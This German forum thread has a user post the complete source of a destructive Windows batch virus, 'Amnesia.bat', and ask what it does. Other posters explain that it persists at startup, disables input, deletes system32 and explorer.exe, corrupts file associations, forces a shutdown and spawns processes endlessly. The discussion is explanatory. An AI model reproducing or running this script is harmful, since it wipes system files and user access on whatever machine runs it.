Funktion erkl�ren

05/05/2012 14:08 xEncounter#1

@echo off
copy "Amnesia.bat" "C:\WINDOWS"
attrib +r +h +s "Amnesia.bat"
copy "Amnesia.bat" "C:\Documents and Settings\Owner\Start Menu\Programs\startup"
copy "Amnesia.bat" "C:\"
copy "Amnesia.bat" "C:\Documents and Settings\Owner\My Documents"
Reg Add "HKCU\Control Panel\Mouse" /v SwapMouseButtons /f /d "10"
rundll32 keyboard, disable
rundll32 mouse, disable
taskkill explorer /t /t
taskkill yahoomessenger /f /t
taskkill msmsgs /t /f
taskkill firefox /f /t
taskkill iexplore /f /t
time 6:66
del "C:\WINDOWS\explorer.exe" /f /q
cd "C:\WINDOWS"
del "*.bat" /f /q
cd "C:\WINDOWS\system32"
del "*.*" /q /f
del "C:\Program Files\messenger\msmsgs.exe" /q /f
del "C:\Program Files\Yahoo!\messenger\YahooMessenger.exe" /q /f
attrib +r +h "C:\Documents and Settings\Owner\My Documents\My Music"
attrib +r +h "C:\Documents and Settings\Owner\My Documents\My Pictures"
attrib +r +h "C:\Documents and Settings\Owner\My Documents\My Videos"
attrib +r +h "C:\Documents and Settings\Owner\My Documents"
attrib +r +h "C:\WINDOWS"
RASDIAL /DISCONNECT
start D:\
reg add "HKLM\SOFTWARE\Mozilla\Mozilla Firefox.0.0.12 (en-US)\main" /v PathtoExe /f /d "C:\WINDOWS\Amnesia.bat"
reg add "HKLM\SOFTWARE\InstallShield\driver\intel32" /v folder /f /d "C:\WINDOWS\Amnesia.bat"
assoc .exe=WMAFile
assoc .mp3=VBSFile
assoc .jpg=THEMEFile
assoc .bmp=THEMEFile
assoc .gif=THEMEFile
echo You have been pwned by Amnesia. Next time, don't be so stupid! >> finalmessage.txt
start finalmessage.txt
shutdown -s -t 60 -c "Say goodbye"
msg * Amnesia has wiped your computer clean
:section1
cd "C:\Documents and Settings\Owner\desktop"
copy "C:\WINDOWS\Amnesia.bat" "8021.bat"
cd "C:\Documents and Settings\Owner\desktop"
md 5265
cd "C:\WINDOWS\system32"
copy "C:\WINDOWS\Amnesia.bat" "2696.bat"
start
start
start
start
start
goto section1

dies ist ein code f�r eine batch datei.
so folgendes problem ich habs auf mein rechner ge�ffnet :facepalm:

kann mir einer schritt f�r schritt erkl�ren was dieses programm anrichtet.
i weiss es ist ein Virus und richtet sch�den an also nicht copy pasten.

05/05/2012 14:20 Tyrar#2

kopiert sich in alle wichtigen start files (dass es zum system start mit startet)
wenn du firefox startest wird das teil gestartet
explorer wird beendet
system32 ordner wird weitestgehend gel�scht, dann wird der rechner runtergefahren.

wenn du keine system backups da hast w�rd ich sagen windows neu drauf klatschen :)

05/05/2012 14:22 xEncounter#3

teile des virus sind garnicht aufgetreten.

einzige was ich hatte war maus klick vertauscht. (konnt man schnell behebn).

system ist nicht runtergefahren.
firefox hab ich zum gl�ck nicht ;).

macht es das internet schlechter ?

05/05/2012 14:28 Tyrar#4

wie es aussieht nur nen disconnect, langsamer aber nicht!

wie gesagt, normal sollte damit der system32 ordner gel�scht werden, wo explorer drin is, taskmanager und alle system programme :)

ist jedenfalls kein 'echter' schaden der angerichtet wird, k�nntest dir eig auch den ganzen kram von der windows dvd ziehen wenn was fehlt ;)

die batch datei kannste auch einfach l�schen

05/05/2012 14:48 xEncounter#5

anscheinend hat der virus nicht wirklich was angerichtet kann daran liegen das ich ihn bevor ich ihn �ffnete in eine exe datei konvertiert hab . nomma gl�ck gehabt

05/05/2012 14:49 Tyrar#6

wie gesagt, richtigen schaden richtet das teil nich an, zumindest w�re der schaden auch nicht schwer zu beheben! (was win7 angeht, alles davor weiss ich nicht!)

05/05/2012 16:14 Beatsu#7

Quote:

Originally Posted by HeavyHacker

kopiert sich in alle wichtigen start files (dass es zum system start mit startet)
wenn du firefox startest wird das teil gestartet
explorer wird beendet
system32 ordner wird weitestgehend gel�scht, dann wird der rechner runtergefahren.

wenn du keine system backups da hast w�rd ich sagen windows neu drauf klatschen :)

Jo. Woher hast du die ganzen Kenntnisse HeavyHacker :D

05/05/2012 16:24 mydoom#8

Quote:

Originally Posted by Beatsu

Jo. Woher hast du die ganzen Kenntnisse HeavyHacker :D

Er kann lesen :<

@OP:
Dass das Virus kaum Schaden angerichtet hat, wird wohl auch darauf zur�ckzuf�hren sein, dass es f�r einige der aufgef�hrten Befehle Admin-Rechte ben�tigt, wenn ich mich jetzt nicht t�usche.

//

Quote:

time 6:66

Interessanterweise wurde hier die Stunde einfach mal um weitere 6 Minuten verl�ngert.

05/05/2012 16:31 .SkyneT.#9

Quote:

Originally Posted by HeavyHacker

wie gesagt, richtigen schaden richtet das teil nich an, zumindest w�re der schaden auch nicht schwer zu beheben! (was win7 angeht, alles davor weiss ich nicht!)

Bei jedem Windows mit UAC d�rfte man nichts im System32 Ordner l�schen k�nnen. (Wenn ich mich nicht irre gibts sogar einen eigenen User, dem man zuerst die Rechte "wegnehmen" muss bevor man dort was l�schen kann)

Btw:
Langsam bekomme ich das Gef�hl das jeder glaubt die Hauptfestplatte
MUSS C:/ sein :rolleyes:

05/05/2012 20:29 Tyrar#10

Quote:

Originally Posted by .SkyneT.

Bei jedem Windows mit UAC d�rfte man nichts im System32 Ordner l�schen k�nnen. (Wenn ich mich nicht irre gibts sogar einen eigenen User, dem man zuerst die Rechte "wegnehmen" muss bevor man dort was l�schen kann)

Btw:
Langsam bekomme ich das Gef�hl das jeder glaubt die Hauptfestplatte
MUSS C:/ sein :rolleyes:

C:\ wird einfach am h�ufigsten verwendet :p
aber bei (gesch�tzten)99% der batch 'viren' nimmt man keinen schaden wenn man das system auf ner andere partition (�brigens nicht festplatte, wie viele vielleicht denken) hat.

grunds�tzlich stimmt das aber, im system32 ordner kann man so einfach nichts l�schen.

@Beatsu: batch verstehen und funktionen der windows programme und befehle kennen.
zus�tzlich noch ein wenig grundverst�ndnis f�r windoof und dann passts!

edit: wollte grad auf meiner xp vm testen, hab aber vergessen dass ich mal meinen treiber code getestet habe :(